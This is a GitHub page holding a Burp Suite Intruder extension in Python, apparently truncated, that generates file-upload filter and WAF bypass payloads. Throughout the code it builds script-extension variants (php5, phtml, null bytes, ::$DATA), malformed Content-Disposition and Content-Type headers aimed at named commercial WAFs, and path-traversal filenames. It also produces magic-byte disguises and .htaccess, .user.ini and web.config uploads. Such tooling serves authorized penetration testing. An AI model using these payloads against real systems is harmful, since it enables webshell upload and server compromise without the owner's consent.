forked from T3nk0/Upload_Auto_Fuzz
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathUpload_Auto_Fuzz.py
More file actions
1497 lines (1251 loc) · 79 KB
/
Upload_Auto_Fuzz.py
File metadata and controls
1497 lines (1251 loc) · 79 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
# -*-coding:utf-8 -*-
from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
import random
from urllib import unquote
import re
import time
def getAttackPayloads(TEMPLATE):
# 获取文件前后缀
filename_suffix = re.search('filename=".*[.](.*)"', TEMPLATE).group(1) # jpg
content_type = TEMPLATE.split('\n')[-1]
def script_suffix_Fuzz():
# 文件后缀绕过
asp_fuzz = ['asp;.jpg', 'asp.jpg', 'asp;jpg', 'asp/1.jpg', 'asp{}.jpg'.format(unquote('%00')), 'asp .jpg',
'asp_.jpg', 'asa', 'cer', 'cdx', 'ashx', 'asmx', 'xml', 'htr', 'asax', 'asaspp', 'asp;+2.jpg']
aspx_fuzz = ['asPx', 'aspx .jpg', 'aspx_.jpg', 'aspx;+2.jpg', 'asaspxpx']
php_fuzz = ['php1', 'php2', 'php3', 'php4', 'php5', 'pHp', 'php .jpg', 'php_.jpg', 'php.jpg', 'php. .jpg',
'jpg/.php',
'php.123', 'jpg/php', 'jpg/1.php', 'jpg{}.php'.format(unquote('%00')),
'php{}.jpg'.format(unquote('%00')),
'php:1.jpg', 'php::$DATA', 'php::$DATA......', 'ph\np']
jsp_fuzz = ['.jsp.jpg.jsp', 'jspa', 'jsps', 'jspx', 'jspf', 'jsp .jpg', 'jsp_.jpg']
# 新增更多后缀绕过方式
asp_fuzz_new = ['asp.', 'asp;', 'asp,', 'asp:', 'asp%20', 'asp%00', 'asp%0a', 'asp%0d%0a',
'asp%0d', 'asp%0a%0d', 'asp%09', 'asp%0b', 'asp%0c', 'asp%0e', 'asp%0f',
'asp.jpg.asp', 'asp.jpg.asp.jpg', 'asp.asp.jpg', 'asp.jpg.123',
'asp.jpg...', 'asp.jpg/', 'asp.jpg\\', 'asp.jpg::$DATA']
php_fuzz_new = ['php.', 'php;', 'php,', 'php:', 'php%20', 'php%00', 'phtml', 'pht', 'phpt',
'php7', 'php8', 'phar', 'pgif', 'php.jpg.php', 'php.jpg.php.jpg',
'php.php.jpg', 'php.jpg.123', 'php.jpg...', 'php.jpg/', 'php.jpg\\']
# 组合所有后缀绕过方式
suffix_fuzz = asp_fuzz + aspx_fuzz + php_fuzz + jsp_fuzz + asp_fuzz_new + php_fuzz_new
suffix_payload = [] # 保存文件后缀绕过的所有payload列表
for each_suffix in suffix_fuzz:
# 测试每个上传后缀
TEMP_TEMPLATE = TEMPLATE
temp = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
suffix_payload.append(temp)
return suffix_payload
def CFF_Fuzz():
# Content-Disposition 绕过 form-data 绕过 filename 绕过
# Content-Disposition: form-data; name="uploaded"; filename="zc.jpg"
Suffix = ['php', 'asp', 'aspx', 'jsp']
# Suffix = ['jsp']
Content_Disposition_payload = [] # 保存Content_Disposition绕过的所有payload列表
# 遍历每个需要测试的上传后缀
for each_suffix in Suffix:
# 测试每个上传后缀
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix,
each_suffix) # TEMP_TEMPLATE_SUFFIX: Content-Disposition: form-data; name="uploaded"; filename="zc.后缀"
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX).group(1)
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX)
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(
TEMP_TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition', 'content-Disposition')) # 改变大小写
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(
TEMP_TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition: ', 'content-Disposition:')) # 减少一个空格
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(
TEMP_TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition: ', 'content-Disposition: ')) # 增加一个空格
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace('form-data', '~form-data'))
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace('form-data', 'f+orm-data'))
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace('form-data', '*'))
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(
TEMP_TEMP_TEMPLATE_SUFFIX.replace('form-data; ', 'form-data; ')) # 增加一个空格
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace('form-data; ', 'form-data;')) # 减少一个空格
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename===zc.{}'.format(
each_suffix))) # 过阿里云waf,删双引号绕过
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename==="zc.{}'.format(
each_suffix))) # 过阿里云waf,少双引号绕过
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename==="zc.{}"'.format(
each_suffix))) # 过阿里云waf,三个等号
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.{}\n"'.format(
each_suffix))) # 过阿里云waf,回车
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'\nfilename==="zc.\n{}"'.format(
each_suffix))) # 过阿里云waf, 三个等号加回车
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.\nC.{}"'.format(
each_suffix))) # 过安全狗和云锁waf # 待定,因为没法删掉Content-Type
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(
TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total, 'filename\n="zc.{}"'.format(each_suffix))) # 过百度云waf
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc\.{}"'.format(
each_suffix))) # 过硬waf,反斜杠绕过
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename===zczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczczc.{}'.format(
each_suffix))) # 过硬waf,超长文件名
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace('form-data',
'form-data------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')) # 过硬waf,超长-
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.jpg";filename="zc.{}"'.format(
each_suffix))) # 双参数
# 新增绕过方式
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.{}.jpg"'.format(
each_suffix))) # 双扩展名绕过
TEMP_TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE_SUFFIX
Content_Disposition_payload.append(TEMP_TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.jpg.{}"'.format(
each_suffix))) # 双扩展名绕过2
return Content_Disposition_payload
def content_type_Fuzz():
# content_type = Content-Type: image/jpeg
content_type_payload = [] # 保存content_type绕过的所有payload列表
Suffix = ['asp', 'aspx', 'php', 'jsp']
# 遍历每个需要测试的上传后缀
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: image/gif')) # 修改为image/gif
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: image/jpeg')) # 修改为image/jpeg
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: application/php')) # 修改为application/php
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: text/plain')) # 修改为text/plain
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, ''))
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(TEMP_TEMPLATE_CONTENT_TYPE.replace('Content-Type', 'content-type')) # 改变大小写
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace('Content-Type: ', 'Content-Type: ')) # 冒号后面 增加一个空格
# 新增Content-Type绕过方式
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: image/png')) # 修改为image/png
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: application/octet-stream')) # 修改为二进制流
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: multipart/form-data')) # 修改为form-data
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: application/x-httpd-php')) # PHP专用
TEMP_TEMPLATE_CONTENT_TYPE = TEMP_TEMPLATE_SUFFIX
content_type_payload.append(
TEMP_TEMPLATE_CONTENT_TYPE.replace(content_type, 'Content-Type: application/x-asp')) # ASP专用
return content_type_payload
def windows_features_Fuzz():
# Windows系统特性绕过
windows_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# NTFS数据流特性
TEMP_TEMPLATE_NTFS = TEMP_TEMPLATE_SUFFIX
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_NTFS).group(1)
windows_payload.append(TEMP_TEMPLATE_NTFS.replace(filename_total,
'filename="zc.{}::$DATA"'.format(each_suffix)))
# IIS短文件名截断
TEMP_TEMPLATE_IIS = TEMP_TEMPLATE_SUFFIX
windows_payload.append(TEMP_TEMPLATE_IIS.replace(filename_total,
'filename="zc.{};.jpg"'.format(each_suffix)))
# 交替数据流
TEMP_TEMPLATE_ADS = TEMP_TEMPLATE_SUFFIX
windows_payload.append(TEMP_TEMPLATE_ADS.replace(filename_total,
'filename="zc:{}"'.format(each_suffix)))
# 保留设备名
for device in ['con', 'aux', 'nul', 'com1', 'com2', 'lpt1']:
TEMP_TEMPLATE_DEVICE = TEMP_TEMPLATE_SUFFIX
windows_payload.append(TEMP_TEMPLATE_DEVICE.replace(filename_total,
'filename="{}.{}"'.format(device, each_suffix)))
return windows_payload
def linux_features_Fuzz():
# Linux系统特性绕过
linux_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# Apache多级扩展名绕过
TEMP_TEMPLATE_APACHE = TEMP_TEMPLATE_SUFFIX
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_APACHE).group(1)
linux_payload.append(TEMP_TEMPLATE_APACHE.replace(filename_total,
'filename="zc.{}.png"'.format(each_suffix)))
# 点号截断
TEMP_TEMPLATE_DOT = TEMP_TEMPLATE_SUFFIX
linux_payload.append(TEMP_TEMPLATE_DOT.replace(filename_total,
'filename="zc.{}."'.format(each_suffix)))
# 路径遍历尝试
TEMP_TEMPLATE_PATH = TEMP_TEMPLATE_SUFFIX
linux_payload.append(TEMP_TEMPLATE_PATH.replace(filename_total,
'filename="../zc.{}"'.format(each_suffix)))
# 特殊字符绕过
for char in ['/', '\\', '?', '*', '|', ':', '"', '<', '>']:
TEMP_TEMPLATE_SPECIAL = TEMP_TEMPLATE_SUFFIX
linux_payload.append(TEMP_TEMPLATE_SPECIAL.replace(filename_total,
'filename="zc{}.{}"'.format(char, each_suffix)))
return linux_payload
def magic_bytes_Fuzz():
# 添加文件魔术字节绕过
magic_bytes_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
# 常见文件魔术字节 (以字符串形式表示,避免二进制问题)
magic_bytes = {
'jpg': '\\xff\\xd8\\xff\\xe0', # JPEG
'png': '\\x89PNG\\r\\n\\x1a\\n', # PNG
'gif': 'GIF89a', # GIF
'pdf': '%PDF-1.5' # PDF
}
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
for magic_type, magic_byte in magic_bytes.items():
# 在Content-Type后添加魔术字节
if 'Content-Type:' in TEMP_TEMPLATE_SUFFIX:
content_type_line = re.search(r'Content-Type:.*', TEMP_TEMPLATE_SUFFIX).group(0)
TEMP_TEMPLATE_MAGIC = TEMP_TEMPLATE_SUFFIX
magic_bytes_payload.append(
TEMP_TEMPLATE_MAGIC.replace(content_type_line, content_type_line + '\r\n' + magic_byte))
return magic_bytes_payload
def file_content_trick_Fuzz():
# 文件内容欺骗技术
content_trick_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# 添加GIF89a文件头
TEMP_TEMPLATE_GIF = TEMP_TEMPLATE_SUFFIX
if 'Content-Type:' in TEMP_TEMPLATE_GIF:
content_type_line = re.search(r'Content-Type:.*', TEMP_TEMPLATE_GIF).group(0)
content_trick_payload.append(TEMP_TEMPLATE_GIF.replace(content_type_line,
content_type_line + '\r\nGIF89a;'))
# 添加PHP代码注释为图像内容
TEMP_TEMPLATE_PHP = TEMP_TEMPLATE_SUFFIX
if 'Content-Type:' in TEMP_TEMPLATE_PHP and each_suffix == 'php':
content_type_line = re.search(r'Content-Type:.*', TEMP_TEMPLATE_PHP).group(0)
content_trick_payload.append(TEMP_TEMPLATE_PHP.replace(content_type_line,
content_type_line + '\r\n<?php /*'))
# 添加SVG XML头
TEMP_TEMPLATE_SVG = TEMP_TEMPLATE_SUFFIX
if 'Content-Type:' in TEMP_TEMPLATE_SVG:
content_type_line = re.search(r'Content-Type:.*', TEMP_TEMPLATE_SVG).group(0)
svg_header = '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"></svg>'
content_trick_payload.append(TEMP_TEMPLATE_SVG.replace(content_type_line,
content_type_line + '\r\n' + svg_header))
return content_trick_payload
def user_ini_Fuzz():
# .user.ini文件包含链式利用
user_ini_payload = []
# 上传.user.ini文件
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_INI = TEMP_TEMPLATE.replace(filename_suffix, 'user.ini')
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_INI).group(1)
user_ini_payload.append(TEMP_TEMPLATE_INI.replace(filename_total, 'filename=".user.ini"'))
# 上传.htaccess文件
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_HTACCESS = TEMP_TEMPLATE.replace(filename_suffix, 'htaccess')
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_HTACCESS).group(1)
user_ini_payload.append(TEMP_TEMPLATE_HTACCESS.replace(filename_total, 'filename=".htaccess"'))
# 上传web.config文件 (IIS)
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_WEBCONFIG = TEMP_TEMPLATE.replace(filename_suffix, 'config')
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_WEBCONFIG).group(1)
user_ini_payload.append(TEMP_TEMPLATE_WEBCONFIG.replace(filename_total, 'filename="web.config"'))
return user_ini_payload
def mime_encoding_Fuzz():
# MIME编码绕过 (RFC 2047)
mime_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# RFC 2047编码
TEMP_TEMPLATE_MIME = TEMP_TEMPLATE_SUFFIX
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_MIME).group(1)
mime_payload.append(TEMP_TEMPLATE_MIME.replace(filename_total,
'filename="=?utf-8?Q?zc.{}?="'.format(each_suffix)))
# Base64编码变种
import base64
encoded_filename = base64.b64encode("zc.{}".format(each_suffix))
TEMP_TEMPLATE_B64 = TEMP_TEMPLATE_SUFFIX
mime_payload.append(TEMP_TEMPLATE_B64.replace(filename_total,
'filename="=?utf-8?B?{}?="'.format(encoded_filename)))
# 混合编码
TEMP_TEMPLATE_MIXED = TEMP_TEMPLATE_SUFFIX
mime_payload.append(TEMP_TEMPLATE_MIXED.replace(filename_total,
'filename="=?utf-8?Q?zc=2E{}?="'.format(each_suffix)))
return mime_payload
def http_protocol_split_Fuzz():
# HTTP协议拆分绕过
http_split_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# 多个Content-Disposition字段
TEMP_TEMPLATE_MULTI = TEMP_TEMPLATE_SUFFIX
if 'Content-Disposition:' in TEMP_TEMPLATE_MULTI:
content_disp = re.search(r'(Content-Disposition:.*?filename=".*?")', TEMP_TEMPLATE_MULTI, re.DOTALL).group(1)
name_part = re.search(r'(name=".*?";)', content_disp)
filename_part = re.search(r'(filename=".*?")', content_disp)
if name_part and filename_part:
name_part = name_part.group(1)
filename_part = filename_part.group(1)
# 拆分为两个字段
new_content = content_disp.replace("{} {}".format(name_part, filename_part),
"{}\r\nContent-Disposition: {}".format(name_part, filename_part))
http_split_payload.append(TEMP_TEMPLATE_MULTI.replace(content_disp, new_content))
# 插入额外的分号
TEMP_TEMPLATE_SEMICOLON = TEMP_TEMPLATE_SUFFIX
if 'Content-Disposition:' in TEMP_TEMPLATE_SEMICOLON:
content_disp = re.search(r'(Content-Disposition:.*?filename=".*?")', TEMP_TEMPLATE_SEMICOLON, re.DOTALL).group(1)
modified_content = content_disp.replace('form-data;', 'form-data;;;;')
http_split_payload.append(TEMP_TEMPLATE_SEMICOLON.replace(content_disp, modified_content))
return http_split_payload
def chunked_encoding_Fuzz():
# 分块传输编码绕过
chunked_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# 添加Transfer-Encoding: chunked头
if 'Content-Type:' in TEMP_TEMPLATE_SUFFIX:
TEMP_TEMPLATE_CHUNKED = TEMP_TEMPLATE_SUFFIX
chunked_header = 'Transfer-Encoding: chunked\r\n'
chunked_payload.append(TEMP_TEMPLATE_CHUNKED.replace('Content-Type:',
chunked_header + 'Content-Type:'))
return chunked_payload
def waf_bypass_Fuzz():
# WAF对抗技术
waf_bypass_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# 双重URL编码
TEMP_TEMPLATE_DOUBLE_URL = TEMP_TEMPLATE_SUFFIX
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_DOUBLE_URL).group(1)
double_encoded = 'filename="zc.%252566ile"' # %2566ile解码后为%66ile,再解码为file
waf_bypass_payload.append(TEMP_TEMPLATE_DOUBLE_URL.replace(filename_total, double_encoded))
# 数据包污染(添加大量随机数据)
TEMP_TEMPLATE_POLLUTION = TEMP_TEMPLATE_SUFFIX
if 'Content-Disposition:' in TEMP_TEMPLATE_POLLUTION:
import random
import string
random_data = ''.join(random.choice(string.ascii_letters) for _ in range(1024))
random_comment = 'X-Random-Data: {}\r\n'.format(random_data)
waf_bypass_payload.append(TEMP_TEMPLATE_POLLUTION.replace('Content-Disposition:',
random_comment + 'Content-Disposition:'))
return waf_bypass_payload
def unicode_normalization_Fuzz():
# Unicode归一化绕过技术 - 简化版
unicode_payload = []
Suffix = ['php'] # 只对PHP文件使用,减少payload数量
# 简化的Unicode字符映射
unicode_chars = {
'p': [u'p', u'\u03c1'], # 拉丁p、希腊rho
'h': [u'h'],
'a': [u'a'],
's': [u's'],
'j': [u'j']
}
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX).group(1)
# 只创建几个最有效的同形异义字符组合
unicode_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.\u03c1hp"')) # 使用希腊rho替代p
unicode_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.p\u04bbp"')) # 使用西里尔h
return unicode_payload
def http_header_smuggling_Fuzz():
# HTTP头走私/走私技术
header_smuggling_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# 添加多个Content-Type头
if 'Content-Type:' in TEMP_TEMPLATE_SUFFIX:
TEMP_TEMPLATE_HEADER = TEMP_TEMPLATE_SUFFIX
header_smuggling_payload.append(TEMP_TEMPLATE_HEADER.replace('Content-Type:',
'Content-Type: application/x-www-form-urlencoded\r\nContent-Type:'))
# 头部折叠攻击
if 'Content-Disposition:' in TEMP_TEMPLATE_SUFFIX:
TEMP_TEMPLATE_FOLDING = TEMP_TEMPLATE_SUFFIX
folded_content = TEMP_TEMPLATE_FOLDING.replace('Content-Disposition:', 'Content-Disposition:\r\n ')
header_smuggling_payload.append(folded_content)
# 特殊分隔符
if 'Content-Disposition:' in TEMP_TEMPLATE_SUFFIX:
TEMP_TEMPLATE_SEPARATOR = TEMP_TEMPLATE_SUFFIX
for separator in ['\t', '\v', '\f']:
header_smuggling_payload.append(TEMP_TEMPLATE_SEPARATOR.replace(': ', ':' + separator))
return header_smuggling_payload
def null_byte_variations_Fuzz():
# 空字节变种攻击 - 简化版
null_byte_payload = []
Suffix = ['php', 'asp'] # 减少测试的后缀
# 最常见的几种空字节表示
null_chars = [
'%00', '\\0', '\\x00', # 常用空字节表示
]
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX).group(1)
for null_char in null_chars:
null_byte_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="zc.{}{}jpg"'.format(each_suffix, null_char)))
return null_byte_payload
def protocol_handler_Fuzz():
# 自定义协议处理器利用 - 简化版
protocol_payload = []
